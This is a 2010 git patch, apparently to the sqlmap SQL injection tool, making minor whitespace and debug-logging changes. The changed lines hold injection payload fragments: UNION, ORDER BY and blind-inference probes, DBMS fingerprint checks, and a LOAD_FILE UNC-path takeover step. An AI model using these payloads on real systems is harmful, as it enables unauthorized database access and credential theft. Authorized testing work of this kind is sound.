From 215175e3b70c3715bfed36ec51dffc3ba27b99e8 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Mon, 25 Oct 2010 14:11:47 +0000 Subject: [PATCH] Minor code adjustments --- lib/core/agent.py | 2 +- lib/request/inject.py | 10 ++++++---- lib/techniques/blind/inference.py | 4 ++-- lib/techniques/blind/timebased.py | 2 +- lib/techniques/error/use.py | 12 +++++++----- lib/techniques/inband/union/test.py | 4 ++-- lib/techniques/inband/union/use.py | 2 -- plugins/dbms/access/fingerprint.py | 4 ++-- plugins/dbms/maxdb/fingerprint.py | 6 +++--- plugins/dbms/mysql/fingerprint.py | 4 ++-- plugins/dbms/mysql/takeover.py | 2 +- plugins/generic/enumeration.py | 2 +- 12 files changed, 28 insertions(+), 26 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 4f3d3e8c4..095e79d0e 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -446,7 +446,7 @@ class Agent: @rtype: C{str} """ - inbandQuery = self.prefixQuery(" UNION ALL SELECT ") + inbandQuery = self.prefixQuery("UNION ALL SELECT ") if query.startswith("TOP"): topNum = re.search("\ATOP\s+([\d]+)\s+", query, re.I).group(1) diff --git a/lib/request/inject.py b/lib/request/inject.py index f8faf0dac..63384c431 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -96,7 +96,8 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r advantage of an blind SQL injection vulnerability on the affected parameter through a bisection algorithm. """ - query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].inference.query) + + query = agent.prefixQuery(queries[kb.misc.testedDbms].inference.query) query = agent.postfixQuery(query) payload = agent.payload(newValue=query) count = None @@ -394,12 +395,13 @@ def goStacked(expression, silent=False): if conf.direct: return direct(expression), None - debugMsg = "query: %s" % expression - logger.debug(debugMsg) - comment = queries[kb.dbms].comment.query query = agent.prefixQuery("; %s" % expression) query = agent.postfixQuery("%s;%s" % (query, comment)) + + debugMsg = "query: %s" % query + logger.debug(debugMsg) + payload = agent.payload(newValue=query) page, _ = Request.queryPage(payload, content=True, silent=silent) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index bb97112a6..f340eac5f 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -441,7 +441,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None if commonValue is not None: # One-shot query containing equals commonValue testValue = unescaper.unescape("'%s'" % commonValue) if "'" not in commonValue else unescaper.unescape("%s" % commonValue, quote=False) - query = agent.prefixQuery(" %s" % safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue))) + query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue))) query = agent.postfixQuery(query) queriesCount[0] += 1 result = Request.queryPage(urlencode(agent.payload(newValue=query))) @@ -465,7 +465,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None # Substring-query containing equals commonPattern subquery = queries[kb.dbms].substring.query % (expressionUnescaped, 1, len(commonPattern)) testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False) - query = agent.prefixQuery(" %s" % safeStringFormat("AND (%s) = %s", (subquery, testValue))) + query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue))) query = agent.postfixQuery(query) queriesCount[0] += 1 result = Request.queryPage(urlencode(agent.payload(newValue=query))) diff --git a/lib/techniques/blind/timebased.py b/lib/techniques/blind/timebased.py index b1013226f..0fa8cc245 100644 --- a/lib/techniques/blind/timebased.py +++ b/lib/techniques/blind/timebased.py @@ -24,7 +24,7 @@ def timeTest(): logger.info(infoMsg) timeQuery = getDelayQuery(andCond=True) - query = agent.prefixQuery(" AND %s" % timeQuery) + query = agent.prefixQuery("AND %s" % timeQuery) query = agent.postfixQuery(query) payload = agent.payload(newValue=query) start = time.time() diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index abe4c568a..54b8855ca 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -35,12 +35,12 @@ def errorUse(expression): Retrieve the output of a SQL query taking advantage of an error SQL injection vulnerability on the affected parameter. """ + output = None logic = conf.logic randInt = randomInt(1) - query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].error.query) + query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query) query = agent.postfixQuery(query) - payload = agent.payload(newValue=query) startLimiter = "" endLimiter = "" @@ -62,11 +62,13 @@ def errorUse(expression): startLimiter = kb.misc.handler.unescape("'%s'" % ERROR_START_CHAR) endLimiter = kb.misc.handler.unescape("'%s'" % ERROR_END_CHAR) - debugMsg = "query: %s" % expressionUnescaped + forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter)) + + debugMsg = "query: %s" % forgedQuery logger.debug(debugMsg) - forgedPayload = safeStringFormat(payload, (logic, randInt, startLimiter, expressionUnescaped, endLimiter)) - result = Request.queryPage(urlencode(forgedPayload), content=True) + payload = agent.payload(newValue=forgedQuery) + result = Request.queryPage(urlencode(payload), content=True) match = re.search('%s(?P.*?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE) if match: diff --git a/lib/techniques/inband/union/test.py b/lib/techniques/inband/union/test.py index fbcd80414..3620e9ce6 100644 --- a/lib/techniques/inband/union/test.py +++ b/lib/techniques/inband/union/test.py @@ -136,7 +136,7 @@ def __unionTestByNULLBruteforce(comment): """ columns = None - query = agent.prefixQuery(" UNION ALL SELECT NULL") + query = agent.prefixQuery("UNION ALL SELECT NULL") for count in range(0, 50): if kb.dbms == "Oracle" and query.endswith(" FROM DUAL"): @@ -164,7 +164,7 @@ def __unionTestByOrderBy(comment): prevPayload = "" for count in range(1, 51): - query = agent.prefixQuery(" ORDER BY %d" % count) + query = agent.prefixQuery("ORDER BY %d" % count) orderByQuery = agent.postfixQuery(query, comment) payload = agent.payload(newValue=orderByQuery) seqMatcher = Request.queryPage(payload, getSeqMatcher=True) diff --git a/lib/techniques/inband/union/use.py b/lib/techniques/inband/union/use.py index d9a8d3598..6066408f7 100644 --- a/lib/techniques/inband/union/use.py +++ b/lib/techniques/inband/union/use.py @@ -196,8 +196,6 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, nullCh query = agent.forgeInbandQuery(expression, nullChar=nullChar) payload = agent.payload(newValue=query) - # NOTE: for debug purposes only - #debugMsg = "query: %s" % payload debugMsg = "query: %s" % query logger.debug(debugMsg) diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py index 9513a5598..300cb50f3 100644 --- a/plugins/dbms/access/fingerprint.py +++ b/plugins/dbms/access/fingerprint.py @@ -37,7 +37,7 @@ class Fingerprint(GenericFingerprint): elif kb.dbmsVersion[0] in ("2002-2003", "2007"): table = "MSysAccessStorage" if table: - query = agent.prefixQuery(" AND EXISTS(SELECT CURDIR() FROM %s)" % table) + query = agent.prefixQuery("AND EXISTS(SELECT CURDIR() FROM %s)" % table) query = agent.postfixQuery(query) payload = agent.payload(newValue=query) result = Request.queryPage(payload) @@ -67,7 +67,7 @@ class Fingerprint(GenericFingerprint): negate = True table = table[1:] randInt = randomInt() - query = agent.prefixQuery(" AND EXISTS(SELECT * FROM %s WHERE %d=%d) FROM %s" % (table, randInt, randInt, table)) + query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s WHERE %d=%d) FROM %s" % (table, randInt, randInt, table)) query = agent.postfixQuery(query) payload = agent.payload(newValue=query) result = Request.queryPage(payload) diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py index beb550dc2..dcc94da05 100644 --- a/plugins/dbms/maxdb/fingerprint.py +++ b/plugins/dbms/maxdb/fingerprint.py @@ -33,7 +33,7 @@ class Fingerprint(GenericFingerprint): infoMsg = "executing SAP MaxDB SYSINFO version check" logger.info(infoMsg) - query = agent.prefixQuery(" /* NoValue */") + query = agent.prefixQuery("/* NoValue */") query = agent.postfixQuery(query) payload = agent.payload(newValue=query) result = Request.queryPage(payload) @@ -47,7 +47,7 @@ class Fingerprint(GenericFingerprint): minor, major = None, None for version in [6, 7]: - query = agent.prefixQuery(" AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version) + query = agent.prefixQuery("AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version) query = agent.postfixQuery(query) payload = agent.payload(newValue=query) result = Request.queryPage(payload) @@ -56,7 +56,7 @@ class Fingerprint(GenericFingerprint): major = version for version in xrange(0, 10): - query = agent.prefixQuery(" AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version) + query = agent.prefixQuery("AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version) query = agent.postfixQuery(query) payload = agent.payload(newValue=query) result = Request.queryPage(payload) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 45d4cdc30..b95b7ebd5 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -33,7 +33,7 @@ class Fingerprint(GenericFingerprint): infoMsg = "executing MySQL comment injection fingerprint" logger.info(infoMsg) - query = agent.prefixQuery(" /* NoValue */") + query = agent.prefixQuery("/* NoValue */") query = agent.postfixQuery(query) payload = agent.payload(newValue=query) result = Request.queryPage(payload) @@ -63,7 +63,7 @@ class Fingerprint(GenericFingerprint): for version in range(element[0], element[1] + 1): randInt = randomInt() version = getUnicode(version) - query = agent.prefixQuery(" /*!%s AND %d=%d*/" % (version, randInt, randInt + 1)) + query = agent.prefixQuery("/*!%s AND %d=%d*/" % (version, randInt, randInt + 1)) query = agent.postfixQuery(query) payload = agent.payload(newValue=query) result = Request.queryPage(payload) diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py index bd4d80d60..535dea898 100644 --- a/plugins/dbms/mysql/takeover.py +++ b/plugins/dbms/mysql/takeover.py @@ -101,7 +101,7 @@ class Takeover(GenericTakeover): def uncPathRequest(self): if not kb.stackedTest: - query = agent.prefixQuery(" AND LOAD_FILE('%s')" % self.uncPath) + query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath) query = agent.postfixQuery(query) payload = agent.payload(newValue=query) diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py index 5e644bd80..3fa56e62a 100644 --- a/plugins/generic/enumeration.py +++ b/plugins/generic/enumeration.py @@ -815,7 +815,7 @@ class Enumeration: length = len(tables) for table in tables: - query = agent.prefixQuery(" %s" % safeStringFormat("AND EXISTS(SELECT 1 FROM %s)", table)) + query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT 1 FROM %s)", table)) query = agent.postfixQuery(query) result = Request.queryPage(urlencode(agent.payload(newValue=query)))